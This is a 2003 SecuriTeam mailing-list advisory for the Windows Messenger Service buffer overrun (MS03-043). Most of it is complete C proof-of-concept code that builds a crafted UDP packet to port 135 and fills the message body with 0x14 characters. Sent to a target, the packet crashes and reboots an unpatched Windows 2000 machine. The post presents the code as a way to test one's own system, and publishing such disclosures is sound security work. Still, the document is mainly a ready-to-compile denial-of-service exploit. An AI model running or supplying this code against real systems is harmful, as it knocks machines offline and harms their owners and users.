[EXPL] Proof of Concept for Windows Messenger Service Overflow
From: SecuriTeam (support_at_securiteam.com)
Date: 10/19/03
- Previous message: SecuriTeam: "[NT] Vulnerability in Exchange Server 5.5 Outlook Web Access Could Allow Cross-Site Scripting Attack (MS03-047)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: list@securiteam.com Date: 19 Oct 2003 13:07:36 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Proof of Concept for Windows Messenger Service Overflow
------------------------------------------------------------------------
SUMMARY
As we reported in our previous article,
<http://www.securiteam.com/windowsntfocus/6L00E1P8KU.html> Buffer Overrun
in Messenger Service Could Allow Code Execution (MS03-043), a
vulnerability allows remote attackers to cause the Messenger Service to
overflow an internal buffer. The following exploit code can be used to
test your system for the mentioned vulnerability.
DETAILS
Exploit:
/*
DoS Proof of Concept for MS03-043 - exploitation shouldn't be too hard.
Launching it one or two times against the target should make the machine
reboot. Tested against a Win2K SP4.
"The vulnerability results because the Messenger Service does not properly
validate the length of a message before passing it to the allocated
buffer" according to MS bulletin. Digging into it a bit more, we find that
when a character 0x14 in encountered in the 'body' part of the message, it
is replaced by a CR+LF. The buffer allocated for this operation is twice
the size of the string, which is the way to go, but
Credits go to LSD :)
*/
#include <stdio.h>
#include <winsock.h>
#include <string.h>
#include <time.h>
// Packet format found thanks to a bit a sniffing
static unsigned char packet_header[] =
"\x04\x00\x28\x00"
"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\xf8\x91\x7b\x5a\x00\xff\xd0\x11\xa9\xb2\x00\xc0"
"\x4f\xb6\xe6\xfc"
"\xff\xff\xff\xff" // @40 : unique id over 16 bytes ? "\xff\xff\xff\xff"
"\xff\xff\xff\xff" "\xff\xff\xff\xff"
"\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\xff\xff\xff\xff"
"\xff\xff\xff\xff" // @74 : fields length
"\x00\x00";
unsigned char field_header[] =
"\xff\xff\xff\xff" // @0 : field length
"\x00\x00\x00\x00"
"\xff\xff\xff\xff"; // @8 : field length
int main(int argc,char *argv[])
{
int i, packet_size, fields_size, s;
unsigned char packet[8192];
struct sockaddr_in addr;
// A few conditions :
// 0 <= strlen(from) + strlen(machine) <= 56
// max fields size 3992
char from[] = "RECCA";
char machine[] = "ZEUS";
char body[4096] = "*** MESSAGE ***";
WSADATA wsaData;
WSAStartup(0x0202, &wsaData);
ZeroMemory(&addr, sizeof(addr));
addr.sin_family = AF_INET;
addr.sin_addr.s_addr = inet_addr("192.168.186.3");
addr.sin_port = htons(135);
ZeroMemory(packet, sizeof(packet));
packet_size = 0;
memcpy(&packet[packet_size], packet_header, sizeof(packet_header) - 1);
packet_size += sizeof(packet_header) - 1;
i = strlen(from) + 1;
*(unsigned int *)(&field_header[0]) = i;
*(unsigned int *)(&field_header[8]) = i;
memcpy(&packet[packet_size], field_header, sizeof(field_header) - 1);
packet_size += sizeof(field_header) - 1;
strcpy(&packet[packet_size], from);
packet_size += (((i - 1) >> 2) + 1) << 2; // padded to a multiple of 4
i = strlen(machine) + 1;
*(unsigned int *)(&field_header[0]) = i;
*(unsigned int *)(&field_header[8]) = i;
memcpy(&packet[packet_size], field_header, sizeof(field_header) - 1);
packet_size += sizeof(field_header) - 1;
strcpy(&packet[packet_size], machine);
packet_size += (((i - 1) >> 2) + 1) << 2; // padded to a multiple of 4
fprintf(stdout, "Max 'body' size (incl. terminal NULL char) = %d\n",
3992 - packet_size + sizeof(packet_header) - sizeof(field_header));
memset(body, 0x14, sizeof(body));
body[3992 - packet_size + sizeof(packet_header) - sizeof(field_header) -
1] = '\0';
i = strlen(body) + 1;
*(unsigned int *)(&field_header[0]) = i;
*(unsigned int *)(&field_header[8]) = i;
memcpy(&packet[packet_size], field_header, sizeof(field_header) - 1);
packet_size += sizeof(field_header) - 1;
strcpy(&packet[packet_size], body);
packet_size += i;
fields_size = packet_size - (sizeof(packet_header) - 1);
*(unsigned int *)(&packet[40]) = time(NULL);
*(unsigned int *)(&packet[74]) = fields_size;
fprintf(stdout, "Total length of strings = %d\nPacket size = %d\nFields
size = %d\n", strlen(from) + strlen(machine) + strlen(body), packet_size,
fields_size);
/*
for (i = 0; i < packet_size; i++)
{
if (i && ((i & 1) == 0))
fprintf(stdout, " ");
if (i && ((i & 15) == 0))
fprintf(stdout, "\n");
fprintf(stdout, "%02x", packet[i]);
}
fprintf(stdout, "\n");
*/
if ((s = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) == -1)
exit(EXIT_FAILURE);
if (sendto(s, packet, packet_size, 0, (struct sockaddr *)&addr,
sizeof(addr)) == -1)
exit(EXIT_FAILURE);
/*
if (recvfrom(s, packet, sizeof(packet) - 1, 0, NULL, NULL) == -1)
exit(EXIT_FAILURE);
*/
exit(EXIT_SUCCESS);
}
ADDITIONAL INFORMATION
The information has been provided by <mailto:recca@mail.ru> Hanabishi
Recca.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: SecuriTeam: "[NT] Vulnerability in Exchange Server 5.5 Outlook Web Access Could Allow Cross-Site Scripting Attack (MS03-047)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
- [UNIX] Sun Microsystems Solaris ld.so doprf() Buffer Overflow Vulnerability
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... Sun Microsystems Solaris ld.so
'doprf' Buffer Overflow Vulnerability ... (Securiteam) - [NT] Microsoft Outlook Express NNTP "LIST" Buffer Overflow (MS05-030)
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... The NNTP news reader embedded
in Outlook Express is vulnerable to buffer ... Remote exploitation of a buffer overflow
vulnerability in the news reader ... (Securiteam) - [UNIX] IBM DB2 Universal Database db2dasStartStopFMDaemon Buffer Overflow Vulnerability
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... IBM DB2 Universal Database
db2dasStartStopFMDaemon Buffer Overflow ... exploitation of a buffer overflow vulnerability
in the db2dasrrm program, ... the attacker can overwrite execution ... (Securiteam) - [NEWS] RealNetworks RealPlayer/HelixPlayer SMIL wallclock Stack Overflow Vulnerability
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... RealNetworks' RealPlayer
and HelixPlayer version 10.5-GOLD ... The stack buffer is declared to be 10 bytes on line
957. ... RealNetworks has addressed this vulnerability by releasing fixed versions ...
(Securiteam) - [EXPL] NetTerms NetFTPd Buffer Overflow (USER, Exploit)
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... Win32 telnet client software -
"NetTerm is a network terminal which can ... NetTerm's NetFTPd has a buffer overflow
on authentication buffer. ... def setebpaddr: ... (Securiteam)
